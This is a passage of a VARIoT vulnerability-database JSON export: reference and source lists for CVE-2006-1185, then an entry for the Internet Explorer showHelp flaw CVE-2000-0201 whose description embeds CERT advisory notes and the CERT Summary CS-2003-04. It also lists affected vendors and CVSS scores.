"url": "http://secunia.com/advisories/18680/"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/com/default.mspx"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/159621"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/216434"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/391803"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/939605"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/740372"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16373/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19269/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx"
},
{
"trust": 0.8,
"url": "http://support.microsoft.com/kb/918165"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19606/"
},
{
"trust": 0.8,
"url": "http://jeffrey.vanderstad.net/grasshopper/"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19378/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17181 "
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
},
{
"trust": 0.8,
"url": "http://www.kb.cert.org/vuls/id/680526"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/16480/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14594"
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21895"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/15891/ "
},
{
"trust": 0.8,
"url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
},
{
"trust": 0.8,
"url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/14087"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/21193"
},
{
"trust": 0.8,
"url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185"
},
{
"trust": 0.8,
"url": "http://www.frsirt.com/english/advisories/2006/1318"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta06-101a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta06-101a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1185"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/18957/"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/217"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/alerts/id/220"
},
{
"trust": 0.3,
"url": "http://www.mozilla.com/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/641460\u003e"
},
{
"trust": 0.1,
"url": "https://update.microsoft.com/microsoftupdate\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/984473\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/341028\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/234812\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/434641\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/824324\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/503124\u003e"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/876678\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/959049\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/10/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/9/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/15891/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-03-23T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2005-08-19T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#503124"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-08-18T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2006-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-17293"
},
{
"date": "2006-04-11T00:00:00",
"db": "BID",
"id": "17450"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"date": "2006-04-12T04:12:55",
"db": "PACKETSTORM",
"id": "45345"
},
{
"date": "2005-07-01T23:31:00",
"db": "PACKETSTORM",
"id": "38386"
},
{
"date": "2006-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"date": "2006-04-11T23:02:00",
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#234812"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#876678"
},
{
"date": "2007-10-11T00:00:00",
"db": "CERT/CC",
"id": "VU#680526"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#984473"
},
{
"date": "2006-05-15T00:00:00",
"db": "CERT/CC",
"id": "VU#641460"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#341028"
},
{
"date": "2006-04-11T00:00:00",
"db": "CERT/CC",
"id": "VU#503124"
},
{
"date": "2006-04-12T00:00:00",
"db": "CERT/CC",
"id": "VU#434641"
},
{
"date": "2005-10-13T00:00:00",
"db": "CERT/CC",
"id": "VU#740372"
},
{
"date": "2005-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#939605"
},
{
"date": "2018-10-12T00:00:00",
"db": "VULHUB",
"id": "VHN-17293"
},
{
"date": "2006-04-11T22:17:00",
"db": "BID",
"id": "17450"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"date": "2021-07-23T12:17:15.613000",
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RDS.Dataspace ActiveX control bypasses ActiveX security model",
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
}
}
VAR-200003-0033
Vulnerability from variot - Updated: 2024-07-22 21:37 The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities is unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.
There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.
VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807
There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack.
Please check the vulnerability notes for resolutions and additional details.
Thank you.
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange. We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. Exploitation of Internet Explorer Vulnerability
The CERT/CC received a number of reports indicating that attackers
were actively exploiting the Microsoft Internet Explorer
vulnerability described in VU#865940. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags.
CERT Advisory IN-2003-04
Exploitation of Internet Explorer Vulnerability
http://www.cert.org/incident_notes/IN-2003-04.html
Vulnerability Note VU#865940
Microsoft Internet Explorer does not properly evaluate
"application/hta" MIME type referenced by DATA attribute
of OBJECT element
http://www.kb.cert.org/vuls/id/865940
6. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated
* Advisories http://www.cert.org/advisories/
* Vulnerability Notes http://www.kb.cert.org/vuls
* CERT/CC Statistics http://www.cert.org/stats/cert_stats.html
* Congressional Testimony http://www.cert.org/congressional_testimony
* Training Schedule http://www.cert.org/training/
* CSIRT Development http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address: CERT Coordination Center, Software Engineering Institute, Carnegie Mellon University, Pittsburgh PA 15213-3890, U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright ©2003 Carnegie Mellon University.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200003-0033",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 2.4,
"vendor": "microsoft",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
},
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2000-0201"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Posted to Bugtraq on March 1, 2000 by Georgi Guninski \u003cjoro@nat.bg\u003e.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200003-002"
}
],
"trust": 0.6
},
"cve": "CVE-2000-0201",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2000-0201",
"trust": 1.0,
"value": "MEDIUM"
},
{
